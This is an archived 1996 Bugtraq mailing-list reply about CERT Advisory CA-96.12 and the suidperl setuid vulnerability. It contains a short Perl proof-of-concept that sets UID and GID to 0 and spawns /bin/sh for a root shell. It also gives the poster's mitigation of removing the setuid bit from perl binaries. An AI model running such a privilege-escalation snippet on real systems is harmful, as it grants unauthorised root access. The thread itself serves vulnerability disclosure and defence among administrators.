Bugtraq mailing list archives
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
From: jseng () pobox org sg (James Seng)
Date: Sun, 30 Jun 1996 17:34:07 +1000
Actually, it should be suidperl, not perl.
It should read as
#!/usr/bin/suidperl
$>=0; $<=0; # Set UID and GID = 0
exec("/bin/sh");
According to the advisory, perl4 and 5 are both susceptible to it so long
you have enable setuid bit emulation (with is by default for most system).
I just do "chmod u-s /usr/bin/*perl*" since i dont use for suid script.
-James Seng
At 11:53 PM 6/29/96 -0400, Brian Tao wrote:
Exactly which versions of perl are susceptible to this? I tried it using /usr/contrib/bin/perl on a BSD/OS 2.0 system as well as /usr/bin/perl on FreeBSD 2.1/2.2 systems, and none gave a root shell. -- Brian Tao (BT300, taob () io org, taob () ican net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't"
Current thread:
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability, (continued)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Casper Dik (Jun 30)
- Validating email sender Brendan McKenna (Jun 30)
- Re: Validating email sender Squidge (Jun 30)
- Re: Validating email sender Alan Brown (Jun 30)
- Re: Validating email sender Casper Dik (Jun 30)
- portmapper dangers der Mouse (Jun 30)
- Re: portmapper dangers Julian Assange (Jun 30)
- Re: portmapper dangers Casper Dik (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)